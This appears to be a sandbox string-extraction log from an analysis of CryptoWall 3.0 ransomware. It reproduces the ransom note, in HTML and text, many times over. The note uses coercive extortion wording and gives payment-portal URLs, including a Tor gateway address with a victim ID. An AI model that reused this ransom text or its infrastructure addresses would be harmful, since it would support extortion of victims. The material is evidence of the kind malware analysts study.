Source: restore_files_gpmus.html83.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt243.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html384.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html31.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt97.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt386.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html234.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html415.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt309.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html117.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt79.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html300.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html16.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html12.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt194.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt239.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt295.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt187.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt11.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt7.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt330.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html89.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html385.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt381.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html405.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a 